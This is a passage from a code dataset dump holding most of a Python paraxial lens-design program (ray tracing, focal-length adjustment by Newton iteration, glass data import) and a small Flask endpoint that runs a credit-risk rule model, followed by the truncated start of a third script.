0, 0]\n for pow_no in range(self.no_pows):\n no_surfs = self.surfs_of_pow[pow_no]\n lens_no = self.lens_index[surf_no]\n v_a = self.div_ratio[pow_no]\n v_p = self.pow_val[pow_no]\n v_s = self.ptlc_spc[lens_no]\n v_r = -self.ptlc_val[lens_no]\n if (v_r != 0 and v_s == PTLCSpecification.FRONT or\n v_s == PTLCSpecification.BACK):\n v_r = -1 / v_r\n v_l_lst = []\n v_n_lst = []\n v_e_lst = []\n for surf in range(no_surfs):\n if (1 < surf and 1 < self.rindex[surf_no + surf] and\n self.surf_inr_of_pow[surf_no + surf] <= 0):\n cal_delta = True\n v_l_lst.append(self.rindex_diff[surf_no + surf])\n v_n_lst.append(self.rindex[surf_no + surf])\n v_e_lst.append(\n abs(self.surf_inr_of_pow[surf_no + surf]) /\n self.rindex_sgd[surf_no + surf])\n v_u_lst.append(abs(self.surf_inr_of_pow[surf_no + surf]))\n v_e_lst[0] = 0\n\n while True:\n lens_no = self.lens_index[surf_no]\n if no_surfs == 1:\n v_f_lst[0] = self.pow_val[pow_no]\n elif no_surfs == 2:\n if self.rindex[surf_no + 1] == 1:\n v_f_lst[0] = fn_p(self.div_ratio[pow_no],\n self.pow_val[pow_no], ED[1])\n v_f_lst[1] = v_f_lst[0] * self.div_ratio[pow_no]\n else:\n v_f_lst[0], v_f_lst[1] = fn_ps(\n v_s, v_l_lst[0], v_l_lst[1], v_p, v_e_lst[1], v_r,\n v_f_lst[0], v_f_lst[1])\n elif no_surfs == 3:\n if v_n_lst[1] == 1:\n v_p_lst, v_f_lst = fn_fc(v_l_lst, v_n_lst, v_f_lst,\n v_e_lst, [v_r, 0], [v_s, 0],\n v_p, v_a, no_surfs, 0)\n v_f_lst[0] = v_p_lst[0]\n elif v_n_lst[2] == 1:\n v_p_lst, v_f_lst = fn_fc(v_l_lst, v_n_lst, v_f_lst,\n v_e_lst, [v_r, 0], [v_s, 0],\n v_p, v_a, no_surfs, 0)\n v_f_lst[2] = v_p_lst[1]\n else:\n v_r = rev(self.ptlc_val[lens_no + 1])\n sign = math.copysign(\n 1,\n v_n_lst[0]) if v_n_lst[0] * v_n_lst[1] > 0 else 0\n v_p_lst, v_f_lst = fn_fc(v_l_lst, v_n_lst, v_f_lst,\n v_e_lst, [v_r, 0], [v_s, 0],\n v_p, v_a, no_surfs, sign)\n v_f_lst[1] = v_l_lst[1] * v_r\n elif no_surfs == 4:\n v_s2 = self.ptlc_spc[lens_no + 1]\n v_r2 = -self.ptlc_val[lens_no + 1]\n if v_r2 != 0 and v_s2 != 0:\n v_r2 = -1 / v_r2\n if v_n_lst[2] == 1:\n v_p_lst, v_f_lst = fn_fc(\n v_l_lst, v_n_lst, v_f_lst, v_e_lst, [v_r, v_r2],\n [v_s, v_s2], v_p, v_a, no_surfs, sign)\n else:\n raise IllegalCaseError('Surfaces in a power is ' +\n no_surfs +\n ' and midst area is Air.')\n if cal_delta == False:\n break\n\n # 中心厚計算\n for surf in range(no_surfs):\n v_b = v_q\n v_br = v_qr\n v_q = 0\n v_qr = 0\n v_f = v_f_lst[surf]\n lens_no = self.lens_index[surf_no + surf]\n if (abs(v_f) > 0.000001 and\n self.rindex_diff[surf_no + surf] != 0):\n v_q = (self.rindex_diff[surf_no + surf] / v_f /\n self.axis_ratio[surf_no + surf]**2)\n v_qr = 1 / v_q\n if (self.surf_inr_of_pow[surf_no + surf] <= 0 and\n self.rindex[surf_no + surf] > 1):\n v_h = self.lens_rad[lens_no]\n v_o = -self.surf_inr_of_pow[surf_no + surf]\n if v_o == 0:\n v_o = math.floor(1.2 * (\n v_h * self.scale)**0.7) / 10 / self.scale\n if v_qr <= v_br:\n v_x = (self.lens_rad[lens_no * 2 - 1]\n if 0 < v_b else v_h)\n v_v = (self.lens_rad[lens_no * 2]\n if 0 > v_q else v_h)\n v_o = v_o + v_b - v_b * math.sqrt(\n abs(1 - (v_x * v_br / self.\n axis_ratio[surf_no + surf - 1])**2)\n ) - v_q + v_q * math.sqrt(\n abs(1 - (v_v * v_qr / self.\n axis_ratio[surf_no + surf])**2))\n if abs(v_o - v_u_lst[surf_no + surf]) > 0.0001:\n cal_delta = True\n v_u_lst[surf_no + surf] = v_o\n v_e_lst[surf_no +\n surf] = v_o / self.rindex_sgd[surf_no + surf]\n v_a = 0\n v_y = 1\n v_w = 0\n for surf in range(no_surfs):\n v_q = v_y\n v_f = v_f_lst[surf]\n v_y = v_y - v_e_lst[surf] * v_a\n v_w = v_w + v_e_lst[surf] / v_q / v_y\n v_a = v_a + v_y * v_f\n self.surf_roc[surf_no + surf] = self.rindex_diff[\n surf_no + surf] / v_f if abs(v_f) > 0.000001 else 0\n if 1 < surf:\n self.surf_inr[surf_no + surf - 1] = self.v_u_lst[surf_no +\n surf - 1]\n v_a = rev(v_a)\n self.surf_inr[surf_no] += (\n self.pow_inr[pow_no] -\n (1 - 1 / v_y) * v_a - v_w) * self.rindex_sgd[surf_no]\n self.surf_inr[surf_no + no_surfs] = (\n v_y - 1) * v_a * self.rindex_sgd[surf_no + no_surfs]\n\n self.surf_inr_delta = self.pow_inr_0 * self.rindex_sgd_0 - self.surf_inr[0]\n if self.obj_dist_spc == ObjectDistance.FIRST_POWER or (\n self.obj_dist_spc == ObjectDistance.INFINITY and\n self.input_dtype != InputDataType.SURFACE):\n self.pow_inr_0 = self.pow_inr[0]\n self.surf_inr_0 = self.surf_inr[0]\n else:\n self.pow_inr_0 = (\n self.surf_inr_0 + self.surf_inr_delta) / self.rindex_sgd_0\n self.pow_inr[0] = self.pow_inr_0\n self.surf_inr[0] = self.surf_inr_0\n\n def adjust_lens_pos(self):\n \"\"\"\n 絞りを含むレンズ位置の修正を行う\n 対応するBASICコード:*INM\n \"\"\"\n self.adjust_pow_pos(self.inr_adj == IntervalAdjustment.FOCAL_LENGTH or\n self.obj_dist_spc == ObjectDistance.INFINITY)\n self.icn = 1\n if self.inr_adj == IntervalAdjustment.FOCAL_LENGTH:\n if self.input_dtype == InputDataType.SURFACE:\n self.adjust_surf_pos(True)\n elif self.inr_adj == IntervalAdjustment.FOCAL_POSITION:\n if (self.tracing_dir == TracingDirection.SCREEN_TO_APERTURE or\n self.tracing_dir ==\n TracingDirection.SCREEN_TO_APERTURE_EXT):\n self.adjust_surf_pos(True)\n self.surf_inr_adj0 = self.surf_inr[self.adj_surf_inr]\n if self.program_operation == ProgramOperation.NEW:\n print(\"物体無限遠で計算終了\")\n self.adjust_surf_pos(self.obj_dist_spc == ObjectDistance.INFINITY)\n elif self.inr_adj == IntervalAdjustment.TELEPHOTO_POWER_0:\n if self.input_dtype == InputDataType.SURFACE:\n self.adjust_surf_pos(\n self.obj_dist_spc == ObjectDistance.INFINITY)\n self.surf_inr[self.tel_no_surfs] = self.focal_pos - sum(\n self.surf_inr[1:self.no_surfs])\n elif self.inr_adj == IntervalAdjustment.FOCAL_POSITION_LENGTH:\n self.pkv = sum(self.surf_inr[2:self.adj_surf_inr - 1])\n self.adjust_surf_pos_beta(True)\n self.surf_inr_fp1 = (\n self.focal_pos - sum(self.surf_inr[2:self.no_surfs]) -\n self.rindex_sgd_prj * v_y / v_a)\n self.surf_inr[1] = self.surf_inr_fp1\n self.adjust_surf_inr()\n self.surf_inr_adj0 = self.surf_inr[self.adj_surf_inr]\n self.surf_inr_adj1 = self.surf_inr[self.adj_surf_inr + 1]\n if self.program_operation == ProgramOperation.NEW:\n print(\"物体無限遠で計算終了\")\n if self.tracing_no == TracingNumber.SINGLE:\n v_y, v_a = self.ray_tracing_surf(\n self.obj_dist_spc == ObjectDistance.INFINITY)\n self.surf_inr[1] = (\n self.focal_pos - sum(self.surf_inr[2:self.no_surfs]) -\n self.rindex_sgd_prj * v_y / v_a)\n self.adjust_surf_inr()\n elif self.inr_adj == IntervalAdjustment.FOCAL_POSITION_SEPARATED:\n if self.dist_index == 1:\n surf_inr_pv = sum(\n self.surf_inr[self.adj_surf_inr:self.adj_surf_inr_b - 1])\n self.irn = 0\n self.surf_inr[self.adj_surf_inr_b] = (\n self.focal_pos - self.focal_len - surf_inr_pv -\n self.surf_inr[self.adj_surf_inr])\n v_y, v_a = self.ray_tracing_surf(True)\n y0 = (sum(self.surf_inr[1:self.no_surfs]) +\n self.rindex_sgd_prj * v_y / v_a - self.focal_pos)\n x1 = self.surf_inr[self.adj_surf_inr]\n x0 = x1 * 1.02\n self.surf_inr[self.adj_surf_inr] = x0\n self.surf_inr[self.adj_surf_inr_b] = (\n self.focal_pos - self.focal_len - surf_inr_pv - x0)\n while True:\n v_y, v_a = self.ray_tracing_surf(True)\n y1 = (sum(self.surf_inr[1:self.no_surfs]) +\n self.rindex_sgd_prj * v_y / v_a - self.focal_pos)\n factor = 1 if 0 < self.irn and abs(y0) <= abs(y1) else 0.9\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1, factor=factor)\n self.surf_inr[self.adj_surf_inr] = x0\n self.surf_inr[self.adj_surf_inr_b] = (\n self.focal_pos - self.focal_len - surf_inr_pv - x0)\n if abs(y1) < 0.0000001:\n break\n if self.telephoto == Telephoto.TRUE:\n self.adjust_surf_pos(\n self.obj_dist_spc == ObjectDistance.INFINITY or\n self.inr_adj == IntervalAdjustment.FOCAL_POSITION_SEPARATED)\n\n def calculate_vals(self):\n \"\"\"\n 焦点距離、主点位置などを計算する\n 対応するBASICコード:*FCL\n \"\"\"\n self.surf_inr[0] = 0\n v_y, v_a, v_w = self.ray_tracing_surf_beta(0)\n v_p = (self.surf_inr[0] + self.tel_prin_pos_prj\n if self.telephoto == Telephoto.TRUE else\n sum(self.surf_inr[:self.no_surfs]))\n # T = 1 / A\n # TC = T * LNM / 100\n self.prin_pos_obj = self.rindex_sgd_0 * (1 / v_a - 1 / v_a / v_y + v_w)\n self.prin_pos_prj = v_p + self.rindex_sgd_prj * (v_y - 1) / v_a\n self.back_focus_inf = self.rindex_sgd_prj * v_y / v_a\n self.determine_base_point_pow()\n if self.obj_dist_spc == ObjectDistance.INFINITY:\n self.surf_inr_index = 0\n self.prin_pos_index = 0\n else:\n self.surf_inr_index = -1 / self.surf_inr_0\n self.prin_pos_index = -1 / (self.surf_inr_0 + self.prin_pos_obj)\n self.imaging_dist = 1 / (self.rindex_sgd_0 * self.prin_pos_index + v_a)\n self.imaging_pos = (self.surf_inr_0 + self.prin_pos_prj +\n self.imaging_dist * self.rindex_sgd_prj)\n self.back_focus = self.back_focus_inf + self.rindex_sgd_prj * (\n self.imaging_dist - 1 / v_a)\n # TC1 = FO * LNM / 100\n # TC2 = TC1 * FO / T\n if self.tracing_dir == TracingDirection.SCREEN_TO_APERTURE or TracingDirection.SCREEN_TO_APERTURE_EXT:\n self.drawing_angle = self.ap_rad / self.imaging_dist / self.rindex_sgd_0\n self.imaging_hgt = self.ap_rad\n else:\n if self.obj_dist_spc == ObjectDistance.INFINITY:\n self.drawing_angle = self.ap_rad * v_a\n else:\n self.drawing_angle = -self.ap_rad * self.prin_pos_index\n\n def determine_base_point_surf(self):\n \"\"\"\n 投影距離のレンズ側の起点をself.obj_dist_spcの値により指定する\n 対応するBASICコード:*LOC\n \"\"\"\n if self.obj_dist_spc == ObjectDistance.PRINCIPAL_POSITION:\n self.obj_dist = self.surf_inr[0] + self.prin_pos_obj\n elif self.obj_dist_spc == ObjectDistance.INFINITY:\n self.obj_dist = self.surf_inr[0]\n else:\n self.obj_dist = self.surf_inr[0] + self.surf_inr_delta\n self.surf_inr_0 = self.surf_inr[0]\n self.pow_inr_0 = (\n self.surf_inr[0] + self.surf_inr_delta) / self.rindex_sgd_0\n self.pow_inr[0] = self.pow_inr_0\n\n def determine_base_point_pow(self):\n \"\"\"\n 投影距離のレンズ側の起点をself.obj_dist_spcの値により指定する\n 対応するBASICコード:*L1C\n \"\"\"\n if self.obj_dist_spc == ObjectDistance.PRINCIPAL_POSITION:\n self.surf_inr_0 = self.obj_dist - self.prin_pos_obj\n elif (self.obj_dist_spc == ObjectDistance.INFINITY and\n self.input_dtype == InputDataType.SURFACE\n ) or self.obj_dist_spc == ObjectDistance.FIRST_SURFACE:\n self.surf_inr_0 = self.obj_dist\n else:\n self.surf_inr_0 = self.obj_dist - self.surf_inr_delta\n self.pow_inr_0 = (\n self.surf_inr_0 + self.surf_inr_delta) / self.rindex_sgd_0\n self.surf_inr[0] = self.surf_inr_0\n self.pow_inr[0] = self.pow_inr_0\n\n def adjust_surf_inr(self):\n \"\"\"\n 調整対象の屈折面間隔の値を修正する\n 対応するBASICコード:*LDK\n \"\"\"\n if self.iris_exists():\n v_o = self.focal_pos - self.surf_inr[1] - self.pkv - self.iris_pos\n self.surf_inr[self.adj_surf_inr +\n 1] += self.surf_inr[self.adj_surf_inr] - v_o\n self.surf_inr[self.adj_surf_inr] = v_o\n\n def adjust_surf_pos(self, dist_infinity):\n \"\"\"\n 屈折面位置を修正して焦点距離を合わせる\n 対応するBASICコード:*DCL\n \"\"\"\n if (\n self.tracing_dir == TracingDirection.SOURCE_TO_APERTURE or\n self.tracing_dir == TracingDirection.SOURCE_TO_APERTURE_EXT\n ) and self.iris_pos > 0 and self.inr_adj == IntervalAdjustment.FOCAL_POSITION:\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y0 = self.rindex_sgd_prj * v_y / v_a - self.focal_pos\n x1 = self.surf_inr[self.adj_surf_inr]\n x0 = x1 * 1.1\n self.surf_inr[self.adj_surf_inr] = x0\n self.surf_inr[self.no_surfs] = self.iris_pos - sum(\n self.surf_inr[:self.no_surfs - 1])\n while True:\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y1 = self.rindex_sgd_prj * v_y / v_a - self.focal_pos\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1)\n self.surf_inr[self.adj_surf_inr] = x0\n self.surf_inr[self.no_surfs] = self.iris_pos - sum(\n self.surf_inr[:self.no_surfs - 1])\n if abs(y1) < 0.00001:\n break\n else:\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y0 = (sum(self.surf_inr[1:self.no_surfs]) +\n self.rindex_sgd_prj * v_y / v_a - self.focal_pos) if (\n self.inr_adj == IntervalAdjustment.FOCAL_POSITION\n ) else v_a - self.focal_len_index\n x1 = self.surf_inr[self.adj_surf_inr]\n x0 = x1 * 1.1\n self.surf_inr[self.adj_surf_inr] = x0\n while True:\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y1 = (sum(self.surf_inr[1:self.no_surfs]) +\n self.rindex_sgd_prj * v_y / v_a - self.focal_pos) if (\n self.inr_adj == IntervalAdjustment.FOCAL_POSITION\n ) else v_a - self.focal_len_index\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1)\n self.surf_inr[self.adj_surf_inr] = x0\n if abs(y1) < 0.00001:\n break\n if self.adj_surf_inr == 1:\n self.determine_base_point_surf()\n\n def adjust_surf_pos_beta(self, dist_infinity):\n \"\"\"\n 屈折面位置を修正して焦点距離を合わせる\n 対応するBASICコード:*DCM\n \"\"\"\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y0 = v_a - self.focal_len_index\n x1 = self.surf_inr[self.adj_surf_inr]\n x0 = x1 * 1.1\n self.surf_inr[self.adj_surf_inr] = x0\n if self.iris_exists():\n self.surf_inr[self.adj_surf_inr +\n 1] = self.surf_inr[self.adj_surf_inr + 1] * 1.1\n while True:\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y1 = v_a - self.focal_len_index\n self.cra = -(x1 - x0) / (y1 - y0)\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1)\n self.surf_inr[self.adj_surf_inr] = x0\n if self.iris_exists():\n self.surf_inr[self.adj_surf_inr +\n 1] = self.surf_inr[self.adj_surf_inr +\n 1] * x0 / x1\n if abs(y1) < 0.00001:\n break\n\n def adjust_pow_pos(self, dist_infinity):\n \"\"\"\n パワー位置を修正して焦点距離を合わせる\n 対応するBASICコード:*INM\n \"\"\"\n if (self.inr_adj == IntervalAdjustment.FOCAL_LENGTH or\n self.inr_adj == IntervalAdjustment.TELEPHOTO_POWER_0):\n v_y, v_a = self.ray_tracing_pow(dist_infinity)\n y0 = v_a - self.focal_len_index\n x1 = self.pow_inr[self.adj_pow_inr]\n x0 = x1 * 1.1\n self.pow_inr[self.adj_pow_inr] = x0\n while True:\n v_y, v_a = self.ray_tracing_pow(dist_infinity)\n y1 = v_a - self.focal_len_index\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1)\n self.pow_inr[self.adj_pow_inr] = x0\n if abs(y1) < .00001:\n break\n if self.inr_adj == IntervalAdjustment.TELEPHOTO_POWER_0:\n self.pow_inr.append(self.focal_pos -\n sum(self.pow_inr[1:self.no_surfs]))\n if self.input_dtype == InputDataType.SURFACE:\n self.convert_surf_to_pow()\n else:\n self.convert_pow_to_surf()\n self.determine_base_point_pow()\n\n def ray_tracing_surf(self, dist_infinity):\n \"\"\"\n 屈折面データを用いて近軸光線追跡\n 対応するBASICコード:*PRT\n \"\"\"\n r_y = 1 if dist_infinity else 0\n r_a = 0 if dist_infinity else 1\n for index in range(self.tel_no_surfs if self.inr_adj ==\n IntervalAdjustment.TELEPHOTO_POWER_0 else\n self.no_surfs):\n r_y -= r_a * self.surf_inr[index] / self.rindex_sgd[index]\n r_a += r_y * self.rindex_diff[index] * rev(self.surf_roc[index])\n return r_y, r_a\n\n def ray_tracing_surf_beta(self, a_a):\n \"\"\"\n 屈折面データを用いて近軸光線追跡\n r_wも計算する\n 対応するBASICコード:*PR0 など\n \"\"\"\n r_y1 = 1 if a_a == 0 else 0\n r_a = a_a\n r_w = 0\n r_y0 = 1\n for index in range(self.no_surfs):\n r_y1 -= r_a * self.surf_inr[index] / self.rindex_sgd[index]\n r_a += r_y1 * self.rindex_diff[index] * rev(self.surf_roc[index])\n r_w += self.surf_inr[index] / self.rindex_sgd[index] / r_y0 / r_y1\n r_y0 = r_y1\n if self.telephoto == Telephoto.TRUE:\n r_y1 -= r_a * (\n self.tel_prin_pos_obj - sum(self.surf_inr[1:self.no_surfs])\n ) / self.rindex_sgd_end\n r_a += r_y1 * self.rindex_sgd_prj / self.tel_focal_len\n r_w += (self.tel_prin_pos_obj - sum(self.surf_inr[1:self.no_surfs])\n ) / self.rindex_sgd_end / r_y0 / r_y1\n return r_y1, r_a, r_w\n\n def ray_tracing_pow(self, dist_infinity):\n \"\"\"\n パワーデータを用いて近軸光線追跡\n 対応するBASICコード:*RTT など\n \"\"\"\n r_y = 1 if dist_infinity else 0\n r_a = 0 if dist_infinity else 1\n for index in range(self.tel_no_pows if self.inr_adj ==\n IntervalAdjustment.TELEPHOTO_POWER_0 else\n self.no_pows):\n r_y -= r_a * self.pow_inr[index]\n r_a += r_y * self.pow_val[index]\n return r_y, r_a\n\n def is_air(self, surf_no):\n \"\"\"\n 光学系内のsurf_noで示される場所が\n 空気層のときにTrueを返す\n \"\"\"\n return (self.rindex[surf_no] == 1 or\n (surf_no not in range(self.no_surfs)))\n\n def iris_exists(self):\n \"\"\"\n 光学系に絞りがあるときにTrueを返す\n \"\"\"\n return (self.iris_pos != 0)\n\n\nclass DataConsistenceError(Exception):\n pass\n\n\nclass NoGlassDataError(Exception):\n pass\n\n\nclass IllegalCaseError(Exception):\n pass\n\n\ndef fn_fc(ridf_lst, ri_lst, pv_lst, pi_lst, ptlc_v_lst, ptlc_s_lst, pv, divr,\n no_surfs, sign):\n \"\"\"\n 対応するBASICコード:*FC\n 引数覚書:\n ridf_lst→rindex diff list\n ri_lst→rindex list\n pv_lst→power value list\n pi_lst→power interval list\n ptlc_v_lst→power to lens curvature value list\n ptlc_s_lst→power to lens curvature specification list\n pv→power value\n divr→division ratio\n no_surf→number of surfaces\n sign→signature\n \"\"\"\n x0 = 0.05\n x1 = 0\n t_pv_lst, pv_lst, y0 = fn_pc(ridf_lst, ri_lst, pv_lst, pi_lst, ptlc_v_lst,\n ptlc_s_lst, pv, divr, no_surfs, sign, 0)\n t_pv_lst, pv_lst, y1 = fn_pc(ridf_lst, ri_lst, pv_lst, pi_lst, ptlc_v_lst,\n ptlc_s_lst, pv, divr, no_surfs, sign, x0)\n while True:\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1)\n t_pv_lst, pv_lst, y1 = fn_pc(ridf_lst, ri_lst, pv_lst, pi_lst,\n ptlc_v_lst, ptlc_s_lst, pv, divr,\n no_surfs, sign, x0)\n if abs(y1) < 0.0000005:\n break\n return t_pv_lst, pv_lst\n\n\ndef fn_pc(ridf_lst, ri_lst, pv_lst, pi_lst, ptlc_v_lst, ptlc_s_lst, pv, divr,\n no_surfs, sign, delta):\n \"\"\"\n 対応するBASICコード:*PC\n 引数覚書:\n ridf_lst→rindex diff list\n ri_lst→rindex list\n pv_lst→power value list\n pi_lst→power interval list\n ptlc_v_lst→power to lens curvature value list\n ptlc_s_lst→power to lens curvature specification list\n pv→power value\n divr→division ratio\n no_surf→number of surfaces\n sign→signature\n delta→delta\n \"\"\"\n t_pv_lst = []\n r_pv_lst = []\n if ridf_lst[0] == 0:\n t_pv_lst.append(0)\n t_pv_lst.append(pv)\n else:\n t_pv_lst.append(fn_p(divr, pv, delta))\n t_pv_lst.append(fn_p(divr, pv, delta) * divr)\n if no_surfs == 4:\n r_pv_lst.extend(\n list(\n fn_ps(ptlc_s_lst[0], ridf_lst[0], ridf_lst[1], t_pv_lst[0],\n pi_lst[1], ptlc_v_lst[0], pv_lst[0], pv_lst[1])))\n r_pv_lst.extend(\n list(\n fn_ps(ptlc_s_lst[1], ridf_lst[2], ridf_lst[3], t_pv_lst[1],\n pi_lst[3], ptlc_v_lst[1], pv_lst[2], pv_lst[3])))\n r_q = (delta - pi_lst[1] * pv_lst[0] / t_pv_lst[0] -\n pi_lst[3] * pv_lst[3] / t_pv_lst[1] - pi_lst[2])\n elif abs(ri_lst[1]) == 1:\n r_pv_lst.append(pv_lst[0])\n r_pv_lst.extend(\n list(\n fn_ps(ptlc_s_lst[0], ridf_lst[1], ridf_lst[2], t_pv_lst[1],\n pi_lst[2], ptlc_v_lst[0], pv_lst[1], pv_lst[2])))\n r_pv_lst.append(pv_lst[3])\n r_q = delta - pi_lst[2] * pv_lst[2] / t_pv_lst[1] - pi_lst[1]\n elif abs(ri_lst[2]) == 1:\n r_pv_lst.extend(\n list(\n fn_ps(ptlc_s_lst[0], ridf_lst[0], ridf_lst[1], t_pv_lst[0],\n pi_lst[1], ptlc_v_lst[0], pv_lst[0], pv_lst[1])))\n r_pv_lst.append(pv_lst[2])\n r_pv_lst.append(pv_lst[3])\n r_q = delta - pi_lst[1] * pv_lst[0] / t_pv_lst[0] - pi_lst[0]\n else:\n r_pv_lst.append((t_pv_lst[0] - (sign - ri_lst[1]) * ptlc_v_lst[0]) /\n (1 - pi_lst[1] * (sign - ri_lst[1]) * ptlc_v_lst[0]))\n r_pv_lst.append(pv_lst[1])\n r_pv_lst.append((t_pv_lst[1] - (ri_lst[2] - sign) * ptlc_v_lst[0]) /\n (1 - pi_lst[2] * (ri_lst[2] - sign) * ptlc_v_lst[0]))\n r_pv_lst.append(pv_lst[3])\n r_q = (delta - pi_lst[1] * pv_lst[0] / t_pv_lst[0] -\n pi_lst[3] * pv_lst[3] / t_pv_lst[1] - pi_lst[2])\n return t_pv_lst, r_pv_lst, r_q\n\n\ndef fn_ps(ptlc_s, ridf0, ridf1, pv, pi, ptlc_v, r_pv0, r_pv1):\n \"\"\"\n 対応するBASICコード:sub PS\n 引数覚書:\n ptlc_s→power to lens curvature specification\n ridf→rindex diff\n pv→power value\n pi→power index\n ptlc_v→power to lens curvature value\n r_pv→return of power value\n \"\"\"\n if ptlc_s == PTLCSpecification.FRONT:\n return ridf0 * ptlc_v, (pv - r_pv0) / (1 - pi * r_pv0)\n elif ptlc_s == PTLCSpecification.BACK:\n return ridf1 * ptlc_v, (pv - r_pv1) / (1 - pi * r_pv1)\n elif ptlc_s == PTLCSpecification.FRONT_OVER_BACK:\n return fn_p(ptlc_v, pv, pi), fn_p(ptlc_v, pv, pi) * ptlc_v\n elif ptlc_s == PTLCSpecification.BACK_OVER_FRONT:\n return fn_p(ptlc_v, pv, pi) * ptlc_v, fn_p(ptlc_v, pv, pi)\n else:\n raise IllegalCaseError(\n 'Power to Lens Curvature Specification is set to ' + ptlc_s +\n ' in fn_ps.')\n\n\ndef fn_p(a_a, a_p, a_e):\n \"\"\"\n 二次方程式の解の公式の変形\n 対応するBASICコード:function fnP\n \"\"\"\n return 2 * a_p / (1 + a_a) / (\n 1 + math.sqrt(1 - 4 * a_p * a_e * a_a / (1 + a_a)**2))\n\n\ndef newton_step(*pos, factor=1):\n \"\"\"\n ニュートン法での計算の際に用いる\n 対応するBASICコード:*ND\n \"\"\"\n x = (pos[0] * pos[1] - pos[2] * pos[3]) / (pos[1] - pos[3])\n return (1 - factor) * pos[0] + factor * x, pos[3], pos[0], pos[3]\n\n\ndef rev(val):\n \"\"\"\n 逆数を計算する(1/0 = 0とする)\n \"\"\"\n if val == 0:\n return 0\n return 1 / val\n\n\ndef get_stringlist(config, category, item):\n \"\"\"\n configで指定されたデータファイルのitemで指定された項目が\n String型データのカンマ区切りで構成されているときに\n String型のリストとして読み込む\n \"\"\"\n if config.get(category, item, fallback='') == '':\n return []\n return [\n e.strip() for e in config.get(category, item, fallback='').split(',')\n ]\n\n\ndef get_floatlist(config, category, item):\n \"\"\"\n configで指定されたデータファイルのitemで指定された項目が\n Float型データのカンマ区切りで構成されているときに\n Float型のリストとして読み込む\n \"\"\"\n if config.get(category, item, fallback='') == '':\n return []\n return [\n float(e.strip())\n for e in config.get(category, item, fallback='').split(',')\n ]\n\n\ndef get_intlist(config, category, item):\n \"\"\"\n configで指定されたデータファイルのitemで指定された項目が\n Int型データのカンマ区切りで構成されているときに\n Int型のリストとして読み込む\n \"\"\"\n if config.get(category, item, fallback='') == '':\n return []\n return [\n int(e.strip())\n for e in config.get(category, item, fallback='').split(',')\n ]\n\n\ndef pad(lst, e, num):\n \"\"\"\n 指定されたリストを所定の長さまで所定の要素でパディングして返す\n \"\"\"\n return (lst + [e] * num)[:num]\n\n\ndef overwrite(lst0, lst1):\n \"\"\"\n lst0の各要素をlst1の各要素で上書きしたリストを返す\n \"\"\"\n return (lst1 + lst0[len(lst1):])[:len(lst0)]\n\n\ndef import_glass_data(config):\n \"\"\"\n configで指定されたデータファイルからガラスデータを読み込む\n 対応するBASICコード:*IN4\n \"\"\"\n global GLASS_DATA\n GLASS_DATA = {}\n data_index = ['dispersion', 'nd', 'nC', 'nF', 'density']\n for key, value in config['Glass Data'].items():\n pv = [float(e.strip()) for e in value.split(',')]\n GLASS_DATA[key.upper()] = dict(zip(data_index, pv))\n","repo_name":"hajimetch/OpticalSystemProgram","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":68695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22221917770","text":"from flask import Flask, redirect, url_for, request, render_template\nimport models.model_rule\n\napp = Flask(__name__) # WSGI应用程序\n\n# route装饰器,告诉flask什么样的URL才能触发我们的函数,返回我们想要显示在用户浏览器中的信息\n\n\n@app.route('/upload')\ndef upload_file():\n return render_template('upload.html')\n\n\n\"\"\"\n 定义规则模型处理函数\n 输入:\n dataset: 数据集文件存放位置\n cateValue: 标签\n deleteValue:需要删除的无关列\n lift_down_lmt:选取用于两两交叉的规则的提升度阈值\n badrate_down_lmt:坏账率阈值\n Rule_min_cnt:规则需命中的最小样本量\n lift_need:规则需要满足的提升度\n min_bad_add:规则集累加参数\n nan_ratio_threshold:剔除缺失值的阈值,默认为0.999\n mode_ratio_threshold:剔除单一值的阈值,默认为0.999\n nan_replace_num:NAN填充值,默认为-999\n train_size:训练集比例,默认为0.7\n max_leaf_num:分箱的最大箱数,默认值为6\n min_woe_box_percent:叶节点最小样本量比例(仅占非空值的),默认值为0.01\n min_woe_box_num_min:叶节点最小样本量;满足叶节点最小样本量比例,且满足叶节点最小样本量,默认值为50\n cor_max:相关性阈值,默认值为0.9\n\n 输出:dict\n rule_final_table: string 最终规则集csv文件地址\n rule_final_effe_table:string 规则集在测试集上的效果文件地址\n \"\"\"\n\n\n@app.route('/', methods=['POST'])\ndef rule_run():\n # 从前端获取数据\n data = request.get_json(silent=True)\n # 调用函数\n res = models.model_rule.model_rule('upload/datasets/creditcard.csv', 'Class', 'V11',\n 2.5, 0.2, 100, 3, 20)\n # 根据前端的需求,返回相应名称的参数\n return res\n\n# @app.route('/upload/file', methods=['POST', 'GET'])\n# def uploader():\n # if request.method == 'POST':\n # data = request.get_json(silent=True)\n # res = models.model_rule.model_rule('../upload/creditcard.csv', 'Time', 'V11',\n # 2.5, 0.2, 100, 3, 20, 0.999, 0.999, -999, 0.7, 6, 0.01, 50, 0.9)\n # file_path = data['files'] # 应该是个路径\n # modeltype = data['modeltype']\n\n # res = {\n # 'status': 0,\n # 'data': {\n # 'header': [\"Col1\", \"Col2\", \"Col3\"],\n # 'rows': [\n # {1, 2, 3},\n # {1, 2, 3}\n # ],\n # 'file': 'file_name',\n # },\n # 'msg': '提示信息'\n # }\n # f = request.files['file']\n # print(request.files)\n # f.save(os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(f.filename)))\n # return res\n # else:\n # return render_template('upload.html')\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"vispery/FlaskModelRunningAPI","sub_path":"data_analysis_util_api/control_rule.py","file_name":"control_rule.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"6151814727","text":"import numpy as np\nimport os\nimport pdb\n\n# To be modified\n\ndatasets = os.listdir('./result')\n\nfor dataset in datasets:\n file = 